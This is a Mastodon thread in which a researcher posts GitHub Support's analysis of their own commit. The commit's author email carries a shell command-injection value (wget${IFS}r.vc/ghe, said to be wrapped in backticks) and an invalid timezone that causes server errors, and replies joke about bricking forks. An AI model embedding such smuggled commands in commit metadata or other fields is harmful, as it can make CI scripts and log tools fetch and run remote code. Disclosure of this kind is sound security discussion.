Public
- Public
- Network
- Groups
- Featured
- Popular
- People

Conversation

Notices

Embed this notice
Ryan Castellucci (they/them) :nonbinary_flag: (ryanc@infosec.exchange)'s status on Wednesday, 11-Jun-2025 18:23:02 JST Ryan Castellucci (they/them) :nonbinary_flag:
- Q ✨
@q
Formatting may get slightly mangled here, but should be decipherable:
GitHub Support, Jun 11, 2025, 8:17 AM UTC
Hi Ryan,
Thanks for your patience. So far, our engineering team found a commit with a malformed author/committer email and and invalid timestamps.
$ git cat-file commit d18cf25755d73e1ebc295155fe278c19f4f874fetree f828c7cd0f33131d46f8761fd875f64ce5af880dparent a69b1149073c467803f73a2efd55c10f07051e59author Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org> 1668615481 -2456committer Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org> 1668615481 -2456
Author and committer email:
author Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org>
That email uses shell expansion syntax: wget${IFS}r.vc/ghe. This is likely an attempt to exploit command substitution in log viewers or tools that unsafely handle commit metadata (e.g., CI scripts or webhooks).
Timestamps:
1668615481 -2456
The negative timezone offset -2456 is invalid. Standard timezones go from -1200 to +1400. This could cause issues in tools that parse or display timezones strictly.
Our engineering team are working on how to handle such scenarios to avoid the server errors you're seeing.
In the meantime, if this commit came from an external contributor or looks unintended, we recommend:
- Inspecting how it got into the repository
- Rewriting history to remove it (if it was part of a PR or forced push)
- Checking your workflow or scripts for unsafe parsing of Git metadata
Please give this a try and update me on how it goes.
In conversation about a year ago from infosec.exchange permalink
Attachments
1. Untitled attachment
2. Untitled attachment
3. Domain not in remote thumbnail source whitelist: daaz.com
  
  Seeing.in Domain Name Is Available to Buy - Domain Name Marketplace
  
  DaaZ, largest domain marketplace simple, easy & secure platform to buy domain names. Buy this Seeing.in Domain at best price at DaaZ.
- Haelwenn /элвэн/ :triskell: likes this.
- Rich Felker repeated this.
- Embed this notice
  Ryan Castellucci (they/them) :nonbinary_flag: (ryanc@infosec.exchange)'s status on Wednesday, 11-Jun-2025 18:39:09 JST Ryan Castellucci (they/them) :nonbinary_flag:
  in reply to
  - Q ✨
  - samir, lost and found
  @samir @q you mean the original repository?
  Oh fuck, lol.
  
  In conversation about a year ago permalink
  
  Haelwenn /элвэн/ :triskell: likes this.
- Embed this notice
  samir, lost and found (samir@mastodon.functional.computer)'s status on Wednesday, 11-Jun-2025 18:39:10 JST samir, lost and found
  in reply to
  - Q ✨
  @ryanc @q I love this. ^_^
  This is the same GitHub where any commit on any fork is accessible in the forked repository, right?
  I wonder if you can brick someone else's repo by forking, without even opening a PR…
  
  In conversation about a year ago permalink
  
  Rich Felker repeated this.
- Embed this notice
  Ryan Castellucci (they/them) :nonbinary_flag: (ryanc@infosec.exchange)'s status on Wednesday, 11-Jun-2025 18:41:32 JST Ryan Castellucci (they/them) :nonbinary_flag:
  in reply to
  - Q ✨
  - samir, lost and found
  @samir @q the replied no to my cheeky request for a bug bounty, and I have shared this gem of deviousness
  
  In conversation about a year ago permalink
- Embed this notice
  Ryan Castellucci (they/them) :nonbinary_flag: (ryanc@infosec.exchange)'s status on Wednesday, 11-Jun-2025 18:42:34 JST Ryan Castellucci (they/them) :nonbinary_flag:
  in reply to
  - Q ✨
  - samir, lost and found
  @samir @q feel free to try and submit it yourself, just give me a shout in the greetz section :-)
  
  In conversation about a year ago permalink
- Embed this notice
  samir, lost and found (samir@mastodon.functional.computer)'s status on Wednesday, 11-Jun-2025 18:42:36 JST samir, lost and found
  in reply to
  - Q ✨
  @ryanc @q Only one way to find out.
  So, about that bug bounty… I think you have a case.
  In conversation about a year ago permalink
  Attachments
  1. Untitled attachment
- Embed this notice
  Ryan Castellucci (they/them) :nonbinary_flag: (ryanc@infosec.exchange)'s status on Thursday, 12-Jun-2025 00:08:51 JST Ryan Castellucci (they/them) :nonbinary_flag:
  in reply to
  - Q ✨
  - Leah Neukirchen
  @leah @q the formatting screwed it up, it's actually wrapped in backticks and yes it's a working email address.
  
  In conversation about a year ago permalink
  
  Haelwenn /элвэн/ :triskell: likes this.
- Embed this notice
  Leah Neukirchen (leah@blahaj.social)'s status on Thursday, 12-Jun-2025 00:08:53 JST Leah Neukirchen
  in reply to
  - Q ✨
  @ryanc @q that's a valid email address, no?
  
  In conversation about a year ago permalink
- Embed this notice
  Rich Felker (dalias@hachyderm.io)'s status on Thursday, 12-Jun-2025 00:14:00 JST Rich Felker
  in reply to
  - Q ✨
  @ryanc @q LMAO, now I know how to keep folks from mirroring my stuff on GitHub and SEO-burying the real repo. 🤣
  
  In conversation about a year ago permalink

Feeds